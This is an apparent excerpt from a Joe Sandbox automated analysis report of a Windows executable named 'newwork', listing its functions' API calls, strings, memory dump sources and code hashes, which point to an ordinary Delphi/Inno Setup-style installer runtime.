                                                                                • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                • String ID: |6B
                                                                                • API String ID: 183575631-3009739247
                                                                                • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1891 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1900 47ced0-47ced5 call 453344 1891->1900 1901 47ceda-47cee9 call 4525d8 1891->1901 1900->1901 1905 47cf03-47cf09 1901->1905 1906 47ceeb-47cef1 1901->1906 1909 47cf20-47cf48 call 42e394 * 2 1905->1909 1910 47cf0b-47cf11 1905->1910 1907 47cf13-47cf1b call 403494 1906->1907 1908 47cef3-47cef9 1906->1908 1907->1909 1908->1905 1911 47cefb-47cf01 1908->1911 1917 47cf6f-47cf89 GetProcAddress 1909->1917 1918 47cf4a-47cf6a call 4078f4 call 453344 1909->1918 1910->1907 1910->1909 1911->1905 1911->1907 1919 47cf95-47cfb2 call 403400 * 2 1917->1919 1920 47cf8b-47cf90 call 453344 1917->1920 1918->1917 1920->1919
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(73BD0000,SHGetFolderPathA), ref: 0047CF7A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                • API String ID: 190572456-1343262939
                                                                                • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1929 40631c-406336 GetModuleHandleA GetProcAddress 1930 406338 1929->1930 1931 40633f-40634c GetProcAddress 1929->1931 1930->1931 1932 406355-406362 GetProcAddress 1931->1932 1933 40634e 1931->1933 1934 406364-406366 SetProcessDEPPolicy 1932->1934 1935 406368-406369 1932->1935 1933->1932 1934->1935
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModulePolicyProcess
                                                                                • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                • API String ID: 3256987805-3653653586
                                                                                • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                APIs
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$Prop
                                                                                • String ID: 3A$yA
                                                                                • API String ID: 3887896539-3278460822
                                                                                • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2697 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2706 46725f-46726a call 478e04 2697->2706 2707 46722c-467233 2697->2707 2712 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2706->2712 2713 4672bb-4672ce call 47d33c 2706->2713 2707->2706 2708 467235-46725a ExtractIconA call 4670c0 2707->2708 2708->2706 2735 4672b6 2712->2735 2719 4672d0-4672da call 47d33c 2713->2719 2720 4672df-4672e3 2713->2720 2719->2720 2723 4672e5-467308 call 403738 SHGetFileInfo 2720->2723 2724 46733d-467371 call 403400 * 2 2720->2724 2723->2724 2733 46730a-467311 2723->2733 2733->2724 2734 467313-467338 ExtractIconA call 4670c0 2733->2734 2734->2724 2735->2724
                                                                                APIs
                                                                                • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                  • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                  • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                • String ID: c:\directory$shell32.dll$%H
                                                                                • API String ID: 3376378930-166502273
                                                                                • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2739 42f560-42f56a 2740 42f574-42f5b1 call 402b30 GetActiveWindow GetFocus call 41eea4 2739->2740 2741 42f56c-42f56f call 402d30 2739->2741 2747 42f5c3-42f5cb 2740->2747 2748 42f5b3-42f5bd RegisterClassA 2740->2748 2741->2740 2749 42f652-42f66e SetFocus call 403400 2747->2749 2750 42f5d1-42f602 CreateWindowExA 2747->2750 2748->2747 2750->2749 2751 42f604-42f648 call 42427c call 403738 CreateWindowExA 2750->2751 2751->2749 2758 42f64a-42f64d ShowWindow 2751->2758 2758->2749
                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 0042F58F
                                                                                • GetFocus.USER32 ref: 0042F597
                                                                                • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                • String ID: TWindowDisabler-Window
                                                                                • API String ID: 3167913817-1824977358
                                                                                • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                • API String ID: 1646373207-2130885113
                                                                                • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                APIs
                                                                                • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                • API String ID: 4130936913-2943970505
                                                                                • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                  • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                  • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                  • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                  • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                • API String ID: 854858120-615399546
                                                                                • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                APIs
                                                                                • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Char$FileIconLoadLowerModuleName
                                                                                • String ID: 2$MAINICON
                                                                                • API String ID: 3935243913-3181700818
                                                                                • Opcode ID: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                • Opcode Fuzzy Hash: a0d1a492a3e1df344d79b5ede7937f80cf878dadafa44837ceada302c6d607ca
                                                                                • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                  • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                  • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                  • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                  • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                  • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                  • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                  • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                  • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                  • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                  • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                • API String ID: 316262546-2767913252
                                                                                • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                APIs
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$Prop
                                                                                • String ID:
                                                                                • API String ID: 3887896539-0
                                                                                • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
